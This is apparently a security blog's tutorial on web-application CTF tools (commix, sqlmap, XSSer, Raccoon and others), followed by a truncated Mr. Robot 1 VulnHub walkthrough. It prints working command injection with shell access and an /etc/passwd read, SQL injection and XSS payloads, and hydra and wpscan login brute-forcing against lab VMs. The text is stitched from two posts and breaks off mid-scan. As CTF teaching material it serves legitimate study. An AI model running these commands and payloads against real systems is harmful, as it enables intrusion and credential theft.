Burpsuite

Burpsuite is an GUI based tool used to intercepting http traffic. The tool is written inJava & created by PortSwigger web security. This tool is mostly used by pentesters/ security researchers & CTFs. According to ethical hacking researcher of international institute of cyber security Burpsuite contains options of many small tools like – scanner, intruder, spider & other tools to scan the URL

Burpsutie Tools

• HTTP Proxy – It works as web proxy server & used as MITM (Man In Middle Attack) between web browser & Burpsuite.
• Scanner – It is used to automate the scan of web application.
• Intruder – This tool automates attacks on web application. Intruder offers pre-written algorithms to generate malicious HTTP request.
• Spider – It is used to crawl website & used in manual mapping to accelerate the process of application functionality.
• Repeater – It is used to modify requests to the server.
• Decoder – This tool is used to transform raw data into hash forms. Decoder is capable of observing encoding formats.
• Comparer – Comparer is used to perform comparison between two items of web application.
• Extender – This tool is used to load extensions for extending burpsuite functionalities.
• Sequencer – It is used to randomness data items of web applications. Mostly it is used to test application session tokens or other important data items which are unpredictable.

Commix

Commix is another tool used by security researchers/ CTFs to automate the web application testing. This tool is designed to find vulnerabilities related to command injection attacks. Attacker can also upload shells using commix such as using malicious php shells or gather session using metasploit.

• For testing you can use different linux distros.
  • ArchStrike
  • BlackArch Linux
  • BackBox
  • Kali Linux
  • Parrot Security OS
  • Pentoo Linux
  • Weakerthan Linux

• We are using Kali Linux 2019.1 amd64. Open terminal type
• git clone https://github.com/commixproject/commix.git
• Type cd commix && ls.
• Type python commix.py –help
• We will showing command injection attack.
• For testing we will use web for pentester vm. Download web for pentester from:
• https://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71/
• Download the web_for_pentester_i386.iso and run this ISO as live boot.
• Now from kali machine, type python commix.py –url https://192.168.1.6/commandexec/example1.php?ip=127.0.0.1
  • where 193.168.1.6 is the IP address of web for pentester ISO running.
  • –url is used to assign target URL We have used web for pentester example 1.
  • As the above url has command line injection vulnerability so it become easy to get reverse shell.
  • Most of the CTFs challenges do need commix to get reverse shell or commix can also be used sql injection attacks.
  • Commix is using ;echo OHJXJE$((9+49))$(echo OHJXJE)OHJXJE payload to create an reverse shell for the attacker.
  • After getting reverse shell, type ls & then type cat%20/etc/passwd will show the stored passwd in the directory.

root@kali:/home/iicybersecurity/Downloads/commix# python commix.py --url https://192.168.1.6/commandexec/example1.php?ip=127.0.0.1
                                       _     /_\   _  _
  /___\ / __\ /' __\ /' __\/\ \ /\ \/'\  v3.0-dev#53
 /\ __//\ \/\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \/>  /\//  \//\//\//\//\//\//\//\//\/_/ (@commixproject)
 +--
 Automated All-in-One OS Command Injection and Exploitation Tool
 Copyright © 2014-2019 Anastasios Stasinopoulos (@ancst)
 +--
 (!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
 [] Checking connection to the target URL… [ SUCCEED ] [] Setting the GET parameter 'ip' for tests.
 [*] Testing the (results-based) classic command injection technique… [ SUCCEED ]
 [+] The GET parameter 'ip' seems injectable via (results-based) classic command injection technique.
     [~] Payload: ;echo OHJXJE$((9+49))$(echo OHJXJE)OHJXJE
 [?] Do you want a Pseudo-Terminal shell? [Y/n] > y
 Pseudo-Terminal (type '?' for available options)
 commix(os_shell) > ls
 example1.php example2.php example3.php index.html
 commix(os_shell) >
commix(os_shell) > cat%20/etc/passwd
 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin openldap:x:103:106:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash

Hackbar

Hackbar is an web browser utility used to decode or encode different hashes. Hackbar comes in Mozilla Firefox extension. Download hackbar from : https://addons.mozilla.org/en-US/firefox/addon/hackbartool/

• Install hackbar. After installing configure an license. This tool 3 months free trial & after you have to pay for continuing hackbar services.
• Open any url in Firefox & enter F12 & click on hackbar. Click on Load URL.
• Then you can go for different options for encoding or decoding hashes. For – example we have open hackthissite.org

• You can click on different options for base64 encode or decode. Hackbar also provides mysql encoding.

• Hackbar gives other options to convert hex into mysql.

OWASP-ZAP

Owasp-zap tool is used to scan web application. As this tool works same as burpsuite. The tool has to be configured with same configuration. You have to give same localhost for the owasp-zap & for Firefox. The tool comes pre-installed in Kali Linux distros. You can also install tool in Windows based OS. It is the world most free security tool maintained by many volunteers. These tools are covered as a part of ethical hacking courses offered by International Institute of Cyber Security.

• Download tool from : https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

• Above you can see owasp-zap http traffic interception. When we opened hackthissite.org, owasp-zap started intercepting the traffic of the URL.
• Above screenshot shows directories of the URL containing. Owasp-zap is very popular among pentesters, security researchers & also used in CTFs challenges.

POSTMAN

Postman is used to debug web application request. Pentesters, security researchers uses postman for checking GET POST & many other request for any web applications. As tool itself offers many features for web application testing. When you enter URL in untitled request postman will start finding its cookies, headers, domain, ssl verification & even the path. You can also open the website inside postman. Download tool from : https://www.getpostman.com/

Above screenshot shows the cookies of youtube.com with expire date & values. In Many CTFs challenges, postman can be used for check target web application behavior. As this does not need any configuration with web browser.

RACCOON

Raccoon is another security tool used for reconnaissance and vulnerability scanning. The tool uses initial phase networking tools to scan the web applications. Raccoon do gives many features like DNS details, whois information, TLS data, sub-domain information, detecting WAF & many other features which are required in gathering information of any web application.

• For testing we are using Kali Linux 2019.1 amd64.
• Open terminal type git clone https://github.com/evyatarmeged/Raccoon.git
• Type cd Raccoon && ls.
• Make sure python3 is installed in your system.
• For that type sudo apt-get update && sudo apt-get install python3 sudo apt-get install python3-pip
• Type pip3 install raccoon-scanner && type python setup.py install
• Type python setup.py develop
• Type raccoon hackthisisite.org

root@kali:/home/iicybersecurity/Downloads/Raccoon# raccoon hackthissite.org
 _                             _    _   _ |  _ \      /\      / |  / |  / _ \   / _ \  | \ | | | |) |    /  \    | |      | |      | |  | | | |  | | |  | | |    /    / /\ \   | |      | |      | |  | | | |  | | | . ` | | | \ \   /  \  | |  | |  | || | | || | | |\  | ||  _\ //    _\  __|  _____|  ____/   ____/  |_| _|
 4841434b414c4c5448455448494e4753
 https://github.com/evyatarmeged/Raccoon
 Raccoon Scan Started
 [#] Trying to gather information about host: hackthissite.org
 [!] Found hackthissite.org to be a naked domain
 [v] Writing DNS query results
 [#] Setting Nmap scan to run in the background
 [#] Nmap script to run: nmap -Pn hackthissite.org
 [v] Nmap scan started
 [#] Started collecting TLS data for hackthissite.org
 [#] Trying to detect WAF presence in hackthissite.org
 [v] Nmap discovered the following ports:
         22/tcp closed ssh
         80/tcp open http
         443/tcp open https
 [v] Did not detect WAF presence in target
 [#] Trying to collect hackthissite.org web application data
 [v] Found robots.txt
 [v] Web server detected: HackThisSite
 [v] Cookie: {PHPSESSID} - both secure and HttpOnly flags are not set
 [!] 2 fuzzable URLs discovered
 [!] 1 HTML forms discovered
 [#] Trying to fetch DNS Mapping for hackthissite.org from DNS dumpster
 [v] Successfully fetched DNS mapping for hackthissite.org
 [v] hackthissite.org WHOIS information retrieved
 [#] Done collecting TLS data
 [v] Supported Ciphers:
 |   TLSv1.2:
 |     ciphers:
 |       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A
 |       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
 |       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (secp256r1) - A
 |       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (secp256r1) - A
 |       TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 4096) - A
 |       TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 4096) - A
 |       TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 4096) - A
 |       TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 4096) - A
 |     compressors:
 |       NULL
 |     cipher preference: server
 |     warnings:
 |       Key exchange (secp256r1) of lower strength than certificate key
 |_  least strength: A
 [x] Could not get a response from hackthissite.org. Maybe target is down ?
 [#] Enumerating Subdomains
 [!] Trying to find Subdomains in SANs list
 [!] Trying to discover subdomains in Google
 [v] Detected subdomain through Google dorking: status.hackthissite.org
 [v] Detected subdomain through Google dorking: irc.hackthissite.org
 [v] Detected subdomain through Google dorking: Radioradio.hackthissite.org
 [v] Detected subdomain through Google dorking: v3dev.hackthissite.org
 [v] Detected subdomain through Google dorking: CryptoPastepaste.hackthissite.org
 [v] Detected subdomain through Google dorking: HackThisSitev3stage.hackthissite.org
 [v] Detected subdomain through Google dorking: ctf.hackthissite.org
 [v] Detected subdomain through Google dorking: legal.hackthissite.org
 [v] Detected subdomain through Google dorking: forums.hackthissite.org
 [v] Detected subdomain through Google dorking: paste.hackthissite.org
 [!] Trying to extract subdomains from DNS dumpster
 [x] Failed to query DNS dumpster for subdomains
 [!] Bruteforcing subdomains
 [#] Reading from list: /usr/local/lib/python3.7/dist-packages/raccoon_src/wordlists/subdomains
         [301] https://WWW.hackthissite.org redirects to https://www.hackthissite.org/
         [301] https://advertising.hackthissite.org redirects to https://advertising.hackthissite.org/
         [301] https://pi.hackthissite.org redirects to https://pi.hackthissite.org/
         [200] https://tor.hackthissite.org
         [301] https://hp.hackthissite.org redirects to https://hp.hackthissite.org/
         [500] https://git.hackthissite.org
         [301] https://stats.hackthissite.org redirects to https://stats.hackthissite.org/
         [301] https://irc.hackthissite.org redirects to https://www.irc.hackthissite.org/
         [200] https://mirror.hackthissite.org
         [301] https://forum.hackthissite.org redirects to https://forum.hackthissite.org/
         [301] https://forums.hackthissite.org redirects to https://forums.hackthissite.org/
         [200] https://radio.hackthissite.org
         [301] https://status.hackthissite.org redirects to https://status.hackthissite.org/
         [301] https://legal.hackthissite.org redirects to https://legal.hackthissite.org/
 [#] Done enumerating Subdomains
 Raccoon scan finished

• As you see that raccoon has found many initial phase information about the web application. For starting with CTF challenge. We can use such tool for gathering information about the URLs as suggested by ethical hacking researcher of International Institute of Cyber Security.

SQLMAP

SqlMap is used for detecting & exploiting sql injection flaws & taking control over their database servers. It comes with powerful detection engine. SQLMap can be used for accessing database to executing commands on different operating systems. SqlMap supports different format of databases. The tool is fairly easy to use.

• Open terminal type git clone https://github.com/sqlmapproject/sqlmap.git
• Type cd sqlmap.
• For testing we are using web for pentesters vm.
• Then type python sqlmap.py -u https://192.168.1.6/sqli/example1.php?name=root
• -u is used to enter the target URL with sql

root@kali:/home/iicybersecurity/Downloads/sqlmap# python sqlmap.py -u https://192.168.1.6/sqli/example1.php?name=root
         _        _H ['] _   {1.3.10.6#dev}
 | -| . [,]     | .'| . |
 ||  [)]|||,|  |
       ||V…       ||   https://sqlmap.org
 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 [*] starting @ 08:11:51 /2019-10-05/
 [08:11:51] [INFO] testing connection to the target URL
 [08:11:51] [INFO] checking if the target is protected by some kind of WAF/IPS
 [08:11:51] [INFO] testing if the target URL content is stable
 [08:11:52] [INFO] target URL content is stable
 [08:11:52] [INFO] testing if GET parameter 'name' is dynamic
 [08:11:52] [WARNING] GET parameter 'name' does not appear to be dynamic
 [08:11:52] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
 [08:11:52] [INFO] testing for SQL injection on GET parameter 'name'
 [08:11:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
 [08:11:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
 [08:11:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
 [08:11:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
 [08:11:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
 [08:11:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
 [08:11:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
 [08:11:52] [INFO] testing 'MySQL inline queries'
 [08:11:52] [INFO] testing 'PostgreSQL inline queries'
 [08:11:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
 [08:11:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
 [08:11:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
 [08:11:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
 [08:11:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
 [08:12:03] [INFO] GET parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
 it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
 [08:12:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [08:12:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [08:12:30] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
 [08:12:30] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
 [08:12:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
 [08:12:30] [INFO] target URL appears to have 5 columns in query
 [08:12:30] [INFO] GET parameter 'name' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
 sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
 Parameter: name (GET)
     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: name=root' AND (SELECT 3961 FROM (SELECT(SLEEP(5)))bdhc) AND 'COlc'='COlc
 Type: UNION query Title: Generic UNION query (NULL) - 5 columns
     Payload: name=root' UNION ALL SELECT CONCAT(0x71706b6a71,0x5a55635463736c696748594a4754536d77756154674f53486f6b634e5a636c524b6c526756685043,0x717a766b71),NULL,NULL,NULL,NULL-- ENow
 [08:12:41] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Debian 6.0 (squeeze)
 web application technology: PHP 5.3.3, Apache 2.2.16
 back-end DBMS: MySQL >= 5.0.12
 [08:12:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.6'
 [*] ending @ 08:12:41 /2019-10-05/

• Above output uses the bunch of list of databases to detect which DB target is using. As sqlmap has found that target is using mysql 5.0.12
• Then sqlmap has send the union query payload to target. And saved output in sqlmap location.
• Type cd /root/.sqlmap/output/192.168.1.6 && ls

root@kali:~/.sqlmap/output/192.168.1.6# ls
 log  session.sqlite  target.txt
root@kali:~/.sqlmap/output/192.168.1.6# cat target.txt
 https://192.168.1.6/sqli/example1.php?name=root (GET)  # sqlmap.py -u https://192.168.1.6/sqli/example1.php?name=rootroot@kali:~/.sqlmap/output/192.168.1.6#
 root@kali:~/.sqlmap/output/192.168.1.6#
 root@kali:~/.sqlmap/output/192.168.1.6# cat log
 sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
 Parameter: name (GET)
     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: name=root' AND (SELECT 3961 FROM (SELECT(SLEEP(5)))bdhc) AND 'COlc'='COlc
 Type: UNION query Title: Generic UNION query (NULL) - 5 columns
     Payload: name=root' UNION ALL SELECT CONCAT(0x71706b6a71,0x5a55635463736c696748594a4754536d77756154674f53486f6b634e5a636c524b6c526756685043,0x717a766b71),NULL,NULL,NULL,NULL-- ENow
 web server operating system: Linux Debian 6.0 (squeeze)
 web application technology: PHP 5.3.3, Apache 2.2.16
 back-end DBMS: MySQL >= 5.0.12

• Above you can see sqlite file. In SQL injection CTFs you can use such methods.

W3AF

W3af is used in web application testing which helps developers & pentesters to find & exploit vulnerabilities in web application. w3af is popular among pentester & security researchers able to find 200+ vulnerabilities. For further installation & working of the w3af go to this link.

XSSER

Xsser is an automation framework designed to automate cross-site scripting attacks. Cross site scripting are most common attacks which are found on web applications. In CTFs challenges Xsser is used.

• Open terminal type git clone https://github.com/epsylon/xsser.git
• Type cd xsser && ls
• Type pip install geoip && pip install BeautifulSoup
• ./xsser -h For testing we will use web for pentester vm.
• Type ./xsser -u https://192.168.1.3/xss/example1.php?name=hacker -c 30
• -u is for target url
• -c is used for no. of times xsser wants to crawl.

root@kali:/home/iicybersecurity/Downloads/xsser# ./xsser -u https://192.168.1.3/xss/example1.php?name=hacker -c 30
 /usr/local/lib/python2.7/dist-packages/BeautifulSoup.py:114: UserWarning: You are using a very old release of Beautiful Soup, last updated in 2011. If you installed the 'beautifulsoup' package through pip, you should know the 'beautifulsoup' package name is about to be reclaimed by a more recent version of Beautiful Soup which is incompatible with this version.
 This will happen at some point after January 1, 2021.
 If you just started this project, this is easy to fix. Install the 'beautifulsoup4' package instead of 'beautifulsoup' and start using Beautiful Soup 4.
 If this is an existing project that depends on Beautiful Soup 3, the project maintainer (potentially you) needs to start the process of migrating to Beautiful Soup 4. This should be a relatively easy part of the Python 3 migration.
   """)
 XSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net) - 2010/2019 -> by psy
 ===========================================================================
 Testing [XSS from CRAWLER]…
 [Info] Crawlering TARGET: https://192.168.1.3/xss/example1.php?name=hacker
 Max. limit: 30
 Deep level: 2 
 [Info] Found enough results… calling all mosquitoes to home!
 
 [Info] Mosquitoes have found: [ 32 ] possible attacking vector(s)
 ===========================================================================
 [*] Test: [ 1/8 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/xss/example7.php?name=XSS ]
 
 [!] Hashing:
 [ 7603b81cd0a8a7dee0f732aaef3a9edc ] : [ name ]
 
 [*] Trying:
 https://192.168.1.3/xss/example7.php?name=%22%3E7603b81cd0a8a7dee0f732aaef3a9edc
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ FOUND! ] -> [ 7603b81cd0a8a7dee0f732aaef3a9edc ] : [ name ] -> [ ">PAYLOAD ]
 ===========================================================================
 [*] Test: [ 2/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/sqli/example4.php?id=XSS ]
 
 [!] Hashing:
 [ 299ef6903c27e1e10e7fef08c32d8aee ] : [ id ]
 
 [*] Trying:
 https://192.168.1.3/sqli/example4.php?id=%22%3E299ef6903c27e1e10e7fef08c32d8aee
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ NOT-FOUND ] -> [ 299ef6903c27e1e10e7fef08c32d8aee ] : [ id ]
 ===========================================================================
 [*] Test: [ 3/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/codeexec/example2.php?order=XSS ]
 
 [!] Hashing:
 [ b0801c83a5dbb2ec41bec856f2ab8c52 ] : [ order ]
 
 [*] Trying:
 https://192.168.1.3/codeexec/example2.php?order=%22%3Eb0801c83a5dbb2ec41bec856f2ab8c52
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ NOT-FOUND ] -> [ b0801c83a5dbb2ec41bec856f2ab8c52 ] : [ order ]
 ===========================================================================
 [*] Test: [ 4/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/xss/example6.php?name=XSS ]
 
 [!] Hashing:
 [ 78ef2f4bcef9a54245bc54689514f5a3 ] : [ name ]
 
 [*] Trying:
 https://192.168.1.3/xss/example6.php?name=%22%3E78ef2f4bcef9a54245bc54689514f5a3
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ FOUND! ] -> [ 78ef2f4bcef9a54245bc54689514f5a3 ] : [ name ] -> [ ">PAYLOAD ]
 ===========================================================================
 [*] Test: [ 5/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/xss/example8.php/XSS ]
 
 [!] Hashing:
 [ 4a3169d21a3088cd83bf366130d6d3db ] : [ https://192.168.1.3/xss/example8.php/XSS ]
 
 [*] Trying:
 https://192.168.1.3/xss/example8.php/">4a3169d21a3088cd83bf366130d6d3db
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 

• Above results that target is vulnerable with xss attacks & can be exploited using xss commands.

The post Top TOOLS for Web Application CTF (Capture the Flag) appeared first on Information Security Newspaper | Hacking News.

• For testing we will use Kali Linux 2019.1 amd64 & Mr. Robot 1. Download Kali from : https://www.kali.org/downloads/
• Download Mr. robot 1 https://www.vulnhub.com/entry/mr-robot-1,151/ We are using Virtual box for completing this CTF.
• Download Virtual box from : https://www.virtualbox.org/
• After downloading open mr.robot vm. Start the VM.

• After then Mr. Robot 1 VM will start.

• Change Mr.robot 1 VM adapter settings to bridge adapter.

• After changing the network settings. Open Kali Linux & type netdiscover command to find out open IP addresses, this will help to find Mr. Robot VM IP address.

• Here 192.168.1.4 is our target. Open web browser type 192.168.1.4

• For further information gathering. We will use sitemap generator files to find which pages are allowed to access. Type 192.168.1.4/robots.txt

• Opening this 192.168.1.4 in browser, opens this.

• On Kali, Open terminal type wget 192.168.1.4/fsocity.dic
• And then type wget 192.168.1.4/key-1-of-3.txt

root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/fsocity.dic
 --2019-09-28 01:44:33--  https://192.168.1.4/fsocity.dic
 Connecting to 192.168.1.4:80… connected.
 HTTP request sent, awaiting response… 200 OK
 Length: 7245381 (6.9M) 
 Saving to: ‘fsocity.dic’
 fsocity.dic                    100%[==================================================>]   6.91M  35.8MB/s    in 0.2s
 2019-09-28 01:44:34 (35.8 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]

 root@kali:/home/iicybersecurity/Desktop# wget 192.168.1.4/key-1-of-3.txt
 --2019-09-28 01:44:54--  https://192.168.1.4/key-1-of-3.txt
 Connecting to 192.168.1.4:80… connected.
 HTTP request sent, awaiting response… 200 OK
 Length: 33 
 Saving to: ‘key-1-of-3.txt’
 key-1-of-3.txt                 100%[==================================================>]      33  --.-KB/s    in 0s
 2019-09-28 01:44:54 (4.68 MB/s) - ‘key-1-of-3.txt’ saved [33/33]

• Here we have 1st key. Type cat key-1-of-3.txt
• According to Ethical hacking researcher of International Institute of Cyber Security, getting key is easy if you are clear on the concepts.

root@kali:/home/iicybersecurity/Desktop# cat key-1-of-3.txt
 073403c8a58a1f80d943455fb30724b9

• For getting rest of two keys. So now we have to access Mr.robot 1 VM.
• Type cat fsocity.dic

root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic
 true
 false
 wikia
 from
 the
 now
 Wikia
 extensions
 scss
 window
 http
 var
 page
 Robot
 Elliot
 styles
 and
 document
 mrrobot
 com
 ago
 function
 eps1
 null
 chat
 user
 Special
 GlobalNavigation
 images
 net
 push
 category
 Alderson
 lang
 nocookie
 ext
 his
 output
 SLOTNAME

• Type cat fsocity.dic | sort -u | uniq > wordlist.dic for creating wordlist.

root@kali:/home/iicybersecurity/Desktop# cat fsocity.dic | sort -u | uniq > wordlist.dic                                  root@kali:/home/iicybersecurity/Desktop#

• Now we will use nikto, Type nikto -h 192.168.1.4 for finding allowed webpages.
• 192.168.1.4 is our target.

root@kali:/home/iicybersecurity/Desktop# nikto -h 192.168.1.4
 - Nikto v2.1.6
 Target IP:          192.168.1.4
 Target Hostname:    192.168.1.4
 Target Port:        80 
 + Start Time:         2019-09-28 01:55:04 (GMT-4)
 Server: Apache
 The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 Retrieved x-powered-by header: PHP/5.5.29
 No CGI Directories found (use '-C all' to force check all possible dirs)
 Uncommon header 'tcn' found, with contents: list
 Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See https://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
 OSVDB-3092: /admin/: This might be interesting…
 Uncommon header 'link' found, with contents: https://192.168.1.4/?p=23; rel=shortlink
 /wp-links-opml.php: This WordPress script reveals the installed version.
 OSVDB-3092: /license.txt: License file found may identify site software.
 /admin/index.html: Admin login page/section found.
 Cookie wordpress_test_cookie created without the httponly flag
 /wp-login/: Admin login page/section found.
 /wordpress: A WordPress installation was found.
 /wp-admin/wp-login.php: WordPress login found
 /wordpresswp-admin/wp-login.php: WordPress login found
 /blog/wp-login.php: WordPress login found
 /wp-login.php: WordPress login found
 /wordpresswp-login.php: WordPress login found
 7915 requests: 0 error(s) and 18 item(s) reported on remote host 
 + End Time:           2019-09-28 01:58:38 (GMT-4) (214 seconds)
 1 host(s) tested 

• For getting Login credentials. We will use hydra which is inbuilt in Kali Linux.
• Type hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’
• -V is used for verbose mode.
• -L is used for Login name, we are using wordlist we created above
• -p is used to try password 123.
• Hydra will return with http-post-form. As target has already allowed login page.

root@kali:/home/iicybersecurity/Desktop# hydra -V -L wordlist.dic -p 123 192.168.1.4 http-post-form '/news.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
 Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-28 02:02:19
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 11452 login tries (l:11452/p:1), ~716 tries per task

[DATA] attacking http-post-form://192.168.1.4:80/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username
[ATTEMPT] target 192.168.1.4 - login "000" - pass "123" - 1 of 11452 [child 0] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000000" - pass "123" - 2 of 11452 [child 1] (0/0)
[ATTEMPT] target 192.168.1.4 - login "000080" - pass "123" - 3 of 11452 [child 2] (0/0)
[ATTEMPT] target 192.168.1.4 - login "001" - pass "123" - 4 of 11452 [child 3] (0/0)
[ATTEMPT] target 192.168.1.4 - login "002" - pass "123" - 5 of 11452 [child 4] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003" - pass "123" - 6 of 11452 [child 5] (0/0)
[ATTEMPT] target 192.168.1.4 - login "0032" - pass "123" - 7 of 11452 [child 6] (0/0)
[ATTEMPT] target 192.168.1.4 - login "003s" - pass "123" - 8 of 11452 [child 7] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004" - pass "123" - 9 of 11452 [child 8] (0/0)
[ATTEMPT] target 192.168.1.4 - login "00480" - pass "123" - 10 of 11452 [child 9] (0/0)
[ATTEMPT] target 192.168.1.4 - login "004s" - pass "123" - 11 of 11452 [child 10] (0/0)
[ATTEMPT] target 192.168.1.4 - login "005s" - pass "123" - 12 of 11452 [child 11] (0/0)
[ATTEMPT] target 192.168.1.4 - login "006s" - pass "123" - 13 of 11452 [child 12] (0/0)
[ATTEMPT] target 192.168.1.4 - login "embed" - pass "123" - 5488 of 11452 [child 8] (0/0)

[80][http-post-form] host: 192.168.1.4   login: Elliot   password: 123
[80][http-post-form] host: 192.168.1.4   login: elliot   password: 123
[ATTEMPT] target 192.168.1.4 - login "Embedded" - pass "123" - 5489 of 11452 child 4
[80][http-post-form] host: 192.168.1.4   login: ELLIOT   password: 123
[ATTEMPT] target 192.168.1.4 - login "embodiment" - pass "123" - 5490 of 11452 child 2

• After getting username – Elliot. Now we will find password.
• For that we will use WPScan for finding.
• WPScan is also an inbuilt tool of Kali Linux for cracking passwords.
• Type wpscan –url 192.168.1.4 –passwords /home/iicybersecurity/Desktop/wordlist.dic –usernames Elliot
• –url – 192.168.1.4 is our target.
• –passwords – wordlist.dic is used which we have created above.
• –username – Elliot is found using hydra.

root@kali:/home/iicybersecurity/Desktop# wpscan --url 192.168.1.4 --passwords /home/iicybersecurity/Desktop/wordlist.dic --usernames Elliot

_______________________________________________________________
